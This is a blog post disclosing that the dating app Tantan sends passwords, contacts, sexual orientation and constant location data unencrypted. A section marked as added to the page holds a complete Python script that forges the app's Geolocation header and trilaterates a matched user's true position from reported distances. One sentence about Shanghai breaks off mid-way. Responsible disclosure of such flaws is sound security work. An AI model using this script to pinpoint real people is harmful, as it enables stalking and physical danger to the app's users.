Update: Tantan CEO and Co-founder Yu Wang reached out to me via email to acknowledge these issues. Read his email and my response.
TL;DR: Chinese Tinder clone Tantan is endangering young women and men by failing to use encryption and exposing private data like that made public in the Ashley Madison hack.
It’s no surprise that dating apps like Tinder, which open up new ways to reduce the risks of dating, have been taking the world by storm. China is well ahead of the curve when it comes to social acceptance of meeting people online. Conditioned by three decades of incredibly fast-paced social change, normal, everyday folks have been making friends and meeting future spouses online since the early days of QQ.
Dating apps are particularly interesting from an information security perspective because of the sensitivity of the behavior they protect. People are secretive about who they’re dating or hooking up with. Publicly broadcasting your latest love adventures can get you in trouble with friends and family.
Behavior changes when using dating apps. Offered the possibility of meeting a cute new boy or girl, people who otherwise care about their privacy or the security of their online accounts throw good sense to the wind.
Early this year, a new player arrived on the Chinese dating app scene called Tantan. A friend, who will remain nameless, excitedly told me about the app and the cute people that were on it. I had to check it out, I was told.
China clone army strikes again
Tantan is essentially a Tinder clone. On the surface, the iPhone app seems smoother and more refined than the app it copies. However, as we’ll soon find out, looks can be deceiving.
Unlike Tinder, which uses Facebook to log in, Tantan asks you for a phone number to verify you and then has you select a password. As part of the on-boarding process, it asks for the usual social network profile information and asks for permission to use your location so that it can find people to match you with nearby.
Next, it offers to hide you from people you already know if you’re willing to share your contact book with them. I’m not married or sneaking around behind anyone’s back, but I’m certainly not in the business of giving my contact book to an unknown Chinese startup. Later, I would find out that I was very glad I made that decision.
I was impressed by how well Tantan functioned compared to Tinder. It was smoother and more user-friendly. Also happily missing was the poor user experience of jumping between apps that comes from Tinder being built on Facebook.
One thing I was a bit disappointed about was that being in Hong Kong instead of the mainland, the app’s target market, there were few people nearby to meet. The nearest users seemed to be in Shenzhen. Oh well. If I couldn’t explore the beauty of the people on the app, I could always explore the beauty of the app!
Behind the scenes
After playing around with the app for a few minutes, I decided to investigate whether the beauty of the app was for real or only skin deep. My first step was to plug my phone into my laptop while running Apple’s Xcode developer tool. This is the tool developers use to build apps for Apple’s products.
One of Xcode’s features allows you to view the console log of your phone. The console log is a scrolling window of text - think of it as a Twitter feed for the apps running on your phone. It lets you know what your phone and the apps on it are doing and helps you track down and fix software bugs.
Apple’s own apps give periodic updates that help developers know what the operating system is doing as it wakes up and puts to sleep the various parts of the iPhone that manage power and radio conditions and could otherwise affect developers’ apps. However, professionally written apps usually turn off many of these messages before they are submitted to the App Store, both for performance reasons and to prevent possibly sensitive information from ending up in logs and escaping the device.
Much to my surprise, Tantan’s developers hadn’t turned off their debug messages, and tons of interesting information was being sent to the console. One of the first things I noticed was that Tantan loads a list of “foul” words that it censors.
I’ll leave deciphering the entire list of words as an exercise for you, my loyal reader (Update: Quartz deciphered them for you!), but a random sampling shows that many of the words have to do with hookups and casual sex. Only platonic or marriage-bound relationships to see here.
Looking up bad words is fun and all, but there were better, more exciting things to see. Scrolling on, I saw the names and addresses of their servers and information about the requests the app was making flashing by.
It seemed strange that an app that appeared so well-written on the surface would be so sloppy underneath. I was interested to look deeper and see if, like so many of the people you meet on dating apps, Tantan’s initial beauty was only a mirage.
Next up, I decided to see what sort of information the app was sending and how well it was protected.
I used ssh to connect to my home router and fired up the tcpdump program to see what sort of data was flying around between the Tantan app running on my phone and Tantan’s server. I looked up the IP address of Tantan’s server and then started watching and collecting traffic using this command:
tcpdump -i ppp88 host 18.104.22.168 and port 80 -n -s 0 -vvv -w tantan
Data sent between an app and a server should be encrypted so that the dozen or more computers it passes through on its journey through the Internet can’t read it. So, naturally, I expected to see a bunch of encrypted, unreadable data passing through my router between my phone and Tantan’s server.
Much to my surprise, the information sent between my phone and Tantan’s server somewhere on the other side of the Great Firewall deep in Mainland China was completely readable. I could see the password I had just entered, my phone number and all the people I was being matched with. And if I could read it, that means any number of other people could as well.
My next step was to fire up Wireshark to get a better view of what was happening.
Seeing all this nicely structured information flowing back and forth piqued my interest in learning more about just what types of data Tantan was collecting from its users and then leaking to the world.
When your shared secret isn’t secret
Usually when reverse engineering an undocumented API to figure out how it works, you have to take a few minutes to set up an intercepting proxy so that you can decrypt and read the traffic. However, Tantan’s security failings made it trivial to see how their app and server interact and talk to each other.
The first thing I noticed was they stored a fixed password in the app that the app must provide to its server before the app is even allowed to connect to sign up a new user or log in an existing user. This password, or shared secret, is static and stored in every copy of Tantan downloaded from the App Store.
Ostensibly, the purpose of this shared secret is to prevent third party apps from connecting to the Tantan server, but without encryption the secret wasn’t very secret.
Tantan shares you with the world
Next, I went through the process of creating a new user. Tantan asked me for my country and phone number before it sent me a code by text message allowing me to continue.
After entering the code, it prompted me to select a password and enter information about:
- My gender
- Sexual orientation
- Partner age preferences
All of this information was sent in cleartext, unencrypted, across the Internet.
Selling out your friends
During the sign up process, after creating an account, new users are prompted to share their contacts with Tantan. Tantan promises to hide you from the people in your contacts list. One imagines this is to avoid the potential, umm, social awkwardness, of showing up as a potential match to a coworker, ex-boyfriend or current wife. Think Ashley Madison meets Tinder.
I’m pretty cognizant of the permissions I grant apps and hadn’t shared my contact book with Tantan when I originally signed up. Boy was I glad I made that decision when I found out that sharing your contact book with Tantan results in the personal details of everyone stored in your phone flying around the Internet for all to see.
The perfect match
Once we’re signed up and we’ve told Tantan (and the world) our gender and age interests, the Tantan app starts asking its server for possible matches. These are the people we’ll be able to swipe left or swipe right, just like on Tinder.
By continuing to look at the unprotected data Tantan is sending us with tcpdump, we can see that the service sends our phone several possible matches with each request. With each potential match comes a lot of fun data about the user. We are sent their age and interests and all of the pictures and videos they’ve added to the service. There’s also a number telling how far our potential Juliet (or Romeo, as the case may be) is from us.
We can then like or dislike a user and see how the app sends a request to the server with that user’s user id to indicate our preference.
Once we’re matched with a user, that is to say the other person also liked us, we’re able to access this information anytime we want instead of waiting until the person is suggested. And since our connection is not encrypted, so can anyone else!
When you first download Tantan, the app asks for permission to track your location. This is because it matches you with people who are nearby. But what does this really mean? What does it do with your location?
Since we know everything Tantan sends is out in the open, visible to anyone who cares to look, we know that it certainly doesn’t treat your location with the confidentiality one would expect of a close friend with intimate knowledge of your dating life. But still…it probably just asks for your location once in a while?
Wrong. In reality, the app sends your location to Tantan’s server every time it talks to the server…which could be several times a minute.
When an app or web browser connects to a server to ask for some information, it sends metadata along with the request called “headers“. Headers are named as such because they are at the very top, or head, of the request.
In Tantan, your location is sent via a header in each request called Geolocation. Our latitude and longitude are sent along with a number indicating how certain your phone is of the location. For example, someone using Tantan on an iPhone in Shenzhen might send geo:22.8,114.0;u=165 while someone in Shanghai would send
By plugging these numbers into a mapping application such as Google Maps, someone watching your Tantan connection can tell not only where you are but, because a fresh location accompanies every request, also make a reasonable guess of where you’re headed.
The fun doesn’t stop there though. Since the connection is unencrypted, we or anyone on the Internet between our phone and Tantan can change our location. This is useful as a way to meet people in other places. In fact, Tinder actually sells this ability as a premium feature on its service.
Stalking Romeo and Juliet
While spoofing your location to meet people in another location is fun, it is also useful for less noble pursuits. You can use it to find the location of and track anyone that matches with you.
Remember how I showed you earlier that matches also include a number that tells us how far the match is from our current location? You can use that information, location spoofing, and some basic high school math to pinpoint the location of your Romeo or Juliet.
You simply need to take note of how far Juliet is from you at three different (spoofed) places; each reading puts her on a circle around the place you claimed to be, and the three circles intersect at her location. This makes Tantan incredibly handy if you want to show up outside of her balcony in the middle of the night…creepy might be a better word.
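The two pieces above, the Geolocation header and the three-circle trick, fit together in a short script. The following is an added example written for this page; it is not code from the original post or from Tantan. It parses header values in the geo:lat,lon;u=metres form the post shows (this is the geo URI syntax of RFC 5870, where u is the uncertainty in metres), builds the spoofed header an attacker would send, and then recovers a target’s position from the distance the service reports at three spoofed positions. Everything else is an assumption: the Shenzhen coordinates are made up, and the service is assumed to return a distance in metres without rounding (a rounded distance turns the exact intersection into a small region but does not defeat the technique). The target’s true position appears only to simulate the server’s answer.

```python
import math
import re

EARTH_R = 6371000.0  # mean Earth radius in metres

# Geolocation header value as the post shows it: "geo:22.8,114.0;u=165".
# This is the geo URI form (RFC 5870); "u" is the uncertainty in metres.
GEO_RE = re.compile(
    r"^geo:(-?\d+(?:\.\d+)?),(-?\d+(?:\.\d+)?)(?:;u=(\d+(?:\.\d+)?))?$"
)


def parse_geo(value):
    """Parse a Geolocation header value into (lat, lon, uncertainty_m)."""
    m = GEO_RE.match(value.strip())
    if not m:
        raise ValueError(f"not a geo URI: {value!r}")
    lat, lon, u = m.groups()
    return float(lat), float(lon), (float(u) if u is not None else None)


def geo_header(lat, lon, uncertainty_m):
    """Build the header value we would send to claim to be at (lat, lon)."""
    return f"geo:{lat:.6f},{lon:.6f};u={int(uncertainty_m)}"


def distance_m(lat1, lon1, lat2, lon2):
    """Great-circle distance (haversine); stands in for the distance the service reports."""
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dphi = p2 - p1
    dlmb = math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dlmb / 2) ** 2
    return 2 * EARTH_R * math.asin(math.sqrt(a))


def to_local_xy(lat, lon, lat0, lon0):
    """Project onto a flat plane around (lat0, lon0); accurate enough over a city."""
    x = math.radians(lon - lon0) * math.cos(math.radians(lat0)) * EARTH_R
    y = math.radians(lat - lat0) * EARTH_R
    return x, y


def from_local_xy(x, y, lat0, lon0):
    """Inverse of to_local_xy."""
    lat = lat0 + math.degrees(y / EARTH_R)
    lon = lon0 + math.degrees(x / (EARTH_R * math.cos(math.radians(lat0))))
    return lat, lon


def trilaterate(observations):
    """observations: three (lat, lon, reported_distance_m) tuples, one per
    spoofed position. Returns the (lat, lon) where the three circles meet."""
    if len(observations) != 3:
        raise ValueError("need exactly three observations")
    lat0, lon0, _ = observations[0]
    (x1, y1, r1), (x2, y2, r2), (x3, y3, r3) = [
        to_local_xy(lat, lon, lat0, lon0) + (d,) for lat, lon, d in observations
    ]
    # (x-xi)^2 + (y-yi)^2 = ri^2 for i = 1..3; subtracting pairs removes the
    # squares and leaves two linear equations A*x + B*y = C and D*x + E*y = F.
    A, B = 2 * (x2 - x1), 2 * (y2 - y1)
    C = r1**2 - r2**2 - x1**2 + x2**2 - y1**2 + y2**2
    D, E = 2 * (x3 - x2), 2 * (y3 - y2)
    F = r2**2 - r3**2 - x2**2 + x3**2 - y2**2 + y3**2
    det = A * E - B * D
    if abs(det) < 1e-9:
        raise ValueError("spoofed positions are collinear; move the third one off the line")
    x = (C * E - B * F) / det
    y = (A * F - C * D) / det
    return from_local_xy(x, y, lat0, lon0)


def demo():
    """Constructed scenario. The target's true position is used only to
    simulate what the service would answer; the attacker never sees it."""
    juliet = (22.5431, 114.0579)  # made-up point in Shenzhen
    spoofed = [(22.50, 114.00), (22.60, 114.00), (22.50, 114.12)]  # not collinear
    observations = []
    for lat, lon in spoofed:
        header = geo_header(lat, lon, 65)  # what we put in the Geolocation header
        lat_s, lon_s, _ = parse_geo(header)
        reported = distance_m(lat_s, lon_s, *juliet)  # what the service sends back
        observations.append((lat_s, lon_s, reported))
    estimate = trilaterate(observations)
    return estimate, distance_m(*estimate, *juliet)


if __name__ == "__main__":
    est, err = demo()
    print(f"estimated position {est[0]:.5f},{est[1]:.5f} ({err:.1f} m off)")
```

The flat-plane projection introduces an error of a few metres over distances of several kilometres, which is far below the uncertainty the phone itself reports. Choosing three positions that are not on one line matters: collinear positions leave the two circle intersections ambiguous, which the script rejects rather than guessing.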
I originally noticed Tantan’s lack of encryption 8 months ago, in March 2015. I reached out to the company via both email and Weibo to get in touch with someone to whom I could report these security and privacy problems. I only decided to publish this post after the company gave no indication that it either acknowledged the problem or planned to fix it.
After 8 months and numerous app updates, Tantan still doesn’t use the basic security of HTTPS to protect users’ privacy or even their passwords despite being told by Apple that they should.
Why should anyone care?
Thanks to the Ashley Madison hack, we’ve all seen what happens when dating services get compromised and information assumed to be private leaks out into the open: relationships suffer, people get stalked or blackmailed and some even feel the need to end their lives.
Tantan’s negligence in not using basic, industry standard, easy to deploy HTTPS encryption means that their service doesn’t even need to be hacked for this same information to make it out into the public. Destroying your own business through your irresponsibility is your problem. Destroying the lives of your unsuspecting and trusting users is both immoral and unethical. It is everyone’s problem.